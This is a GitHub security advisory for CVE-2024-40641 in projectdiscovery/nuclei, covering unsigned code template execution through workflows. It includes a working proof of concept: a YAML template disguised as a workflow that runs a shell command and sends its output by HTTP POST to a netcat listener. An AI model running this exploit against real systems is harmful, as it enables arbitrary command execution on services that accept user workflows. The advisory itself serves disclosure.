CVE-2024-40641 github.com/projectdiscovery/nuclei/v3

Package

Manager: go
Name: github.com/projectdiscovery/nuclei/v3
Vulnerable Version: >=0 <3.3.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N

EPSS: 0.00046 pctl0.13692

Details

projectdiscovery/nuclei allows unsigned code template execution through workflows

### Summary

Found a way to execute a code template without the -code option and a signature.

### Details

Write a `code.yaml`:

```yaml
id: code

info:
  name: example code template
  author: ovi3

code:
  - engine:
      - sh
      - bash
    source: |
      id

http:
  - raw:
      - |
        POST /re HTTP/1.1
        Host: {{Hostname}}

        {{code_response}}

workflows:
  - matchers:
      - name: t
```

Use nc to listen on port 80:

```bash
nc -lvvnp 80
```

Execute the PoC template with nuclei:

```bash
./nuclei -disable-update-check -w code.yaml -u http://127.0.0.1 -vv -debug
```

and nc will receive the `id` command output.

We use `-w` to specify a workflow file, not `-t` for a template file, and notice there is a `workflows` field in code.yaml so that it pretends to be a workflow file.

Tested on Linux with Nuclei v3.2.9.

### Impact

Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute.)

Metadata

Created: 2024-07-17T19:32:23Z
Modified: 2024-08-20T14:57:15Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c3q9-c27p-cw9h/GHSA-c3q9-c27p-cw9h.json
CWE IDs: ["CWE-78"]
Alternative ID: GHSA-c3q9-c27p-cw9h
Finding: F004
Auto approve: 1